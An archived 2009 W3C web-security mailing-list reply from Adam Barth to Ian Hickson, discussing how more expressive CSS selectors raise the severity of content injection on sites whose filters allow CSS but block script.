- From: Adam Barth <w3c@adambarth.com>
- Date: Sun, 6 Dec 2009 08:22:37 -0800
- To: Ian Hickson <ian@hixie.ch>
- Cc: Maciej Stachowiak <mjs@apple.com>, sird@rckc.at, public-web-security@w3.org
On Sun, Dec 6, 2009 at 1:21 AM, Ian Hickson <ian@hixie.ch> wrote: > On Sat, 5 Dec 2009, Adam Barth wrote: >> I think you're missing the main attack that sird's worried about: >> >> Assumptions: >> >> 1) The attacker can injection content into the target web site, but >> cannot injection script. > > If you grant the assumption that the page has a faulty filter, IMHO it > becomes easy to have all kinds of vulnerabilities. That filters should > make sure the user can't insert arbitrary CSS is not new. Selectors and > expressions get more and more expressive with each year, but they pale in > comparison to the kind of deep analysis you can do to a page using XSLT > and XPath, for example. This is why filters should always whitelist only > features they consider safe. The issue is slightly more subtle than you describe. Filters aren't "faulty" or "safe," they just restrict what kinds of things the attacker can inject. The question is what bad things the attacker can do with these injections. sird's point is that allowing CSS is more severe than it used to be (modulo expression() and -moz-binding, which are generally considered poor features from a security point of view). Imagine all the sites on the web as existing as regions on a map colored by the severity of the bad things the attacker can do on those sites, even restricted by their filters. Some percent of the map has unrestricted XSS and is bright red. Some percent of the map is locked down to allowing only the letter "a" and is bright green. The point is this feature turns some non-negligible percent of the map a brighter shade of red. That's something that we should know about and balance against the added functionality of the attack surface. Adam
Received on Sunday, 6 December 2009 16:23:40 UTC